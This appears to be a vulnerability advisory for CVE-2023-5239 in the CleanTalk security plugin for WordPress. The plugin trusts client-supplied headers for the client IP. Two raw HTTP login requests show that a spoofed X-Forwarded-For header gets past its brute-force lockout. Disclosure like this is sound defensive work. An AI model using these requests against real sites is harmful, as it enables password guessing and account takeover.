Security & Malware scan by CleanTalk < 2.121 – IP Spoofing | CVE 2023-5239

Description

This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass bruteforce protection.

Proof of Concept

Send 5 invalid login requests and thus block the IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

Send login request with X-Forwarded header and spoofed IP address.

POST /wp-login.php HTTP/1.1
Host: localhost
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Cookie: wp-settings-time-2=1692902176; betterlinks_visitor=bl64ece171d4145; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dupload%26cats%3Dpop; wp-settings-time-1=1695178741
Connection: close
X-Forwarded-For: 8.8.8.8

log=admin&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

Check the logs by visiting /wp-admin/options-general.php?page=spbc&spbc_tab=security_log.